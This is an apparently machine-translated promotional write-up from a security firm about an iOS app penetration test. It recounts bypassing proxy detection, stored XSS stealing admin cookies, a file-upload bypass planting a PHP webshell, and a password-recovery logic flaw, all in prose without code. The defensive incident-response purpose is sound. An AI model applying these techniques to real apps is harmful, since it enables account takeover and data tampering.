Shulou(Shulou.com)06/01 Report--

There are few security articles related to the APP penetration test on the IOS side throughout the Internet. A few days ago, a customer's APP data was tampered with, resulting in users being casually withdrawn, arbitrary coins, and coin conversion caused great economic losses to the operation of the platform. Through the introduction of friends, find our SINE security company to seek security solutions to prevent APP from continuing to be tampered with and attacked. In response to the customer's situation, we immediately set up a security emergency response team to conduct a comprehensive security penetration of the customer's APP and server.

First of all, we need to understand what architecture the customer's IOS APP application uses. After the detailed inspection and code analysis of our security engineers, we use the website language development, PHP+mysql database + VUE combination development, and the server system is the Linux centos version.

We set up an environment for penetration testing, download the customer's latest APP application to the phone, and open port 8098 as a proxy port to grab and intercept the data of APP, but flicker after opening APP. The APP of the customer is obtained by grabbing the packet, and the proxy detection mechanism is used. When the phone uses an agent for access, it will automatically determine whether it is a proxy, and if so, an error value will be returned. And force APP to exit, cutting off all network connections with APP. Then for our SINE security technology, it is very simple to bypass. By decompiling the IPA package, the code analysis traces back to the source code detected by the APP agent. There is a piece of code that is set separately, and when the value is judged to be 1, it can be bypassed directly. We directly HOOK the code, bypassing the proxy detection mechanism.

Next, we SINE security engineers carried out a comprehensive penetration test service for the normal functions of the customer APP, such as user registration, user password recovery, login, and user message, user profile upload, coin recharge, secondary password and other functions. In the user message, we found that malicious XSS cross-site code can be written to the backend. When the user submits the message data POST to the background data on the app side. When the background administrator checks the user's message, he will intercept the APP administrator's cookies value and the background login address. The attacker uses the XSS loophole to obtain the administrator rights of the background. The previous security problems such as the tampering of member data are caused by this loophole. Customers say that some operation logs of modifying members are not recorded in the background. Normally, if the administrator sets up the operation of the member in the background. There will be operation logs recorded in the backend. Through these feedback from customers, we continue to conduct penetration testing on APP. As expected by SINE security, there is a function of uploading pictures in the background. We POST intercepts data packets, modifies the uploaded file type to the PHP suffix name, directly passes the POST data, and directly bypasses the code detection to upload the PHP script file to the backend image directory.

The back door of the uploaded website Trojan is also called webshell. There is a file upload loophole in the backstage of the customer's website, which can upload files in any format. We also logged on to the customer's server to analyze and process nginx logs and found traces of attackers. On the evening of December 20, XSS loopholes obtained background permissions and uploaded webshell through file upload vulnerabilities, and used webshell to obtain APP database configuration files. Through the built-in mysql connection function of webshell, the member data is modified directly, and the problem of customer member data being tampered with has been satisfactorily solved. We also conducted penetration tests on other functions and found that there are logical loopholes in the user password recovery function, which can directly modify the password of any member account by bypassing the verification code.

The APP penetration test found a total of three vulnerabilities, XSS cross-site vulnerabilities, file upload vulnerabilities, user password recovery logic vulnerabilities, these vulnerabilities are high-risk vulnerabilities in our security community, which can have a significant impact on APP, websites, and servers, and can not be ignored. APP security brings users' data security, and only when users are safe, can they bring win-win benefits. If you do not understand penetration testing, you can also find a professional website security company, as well as penetration testing company to help you test it.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.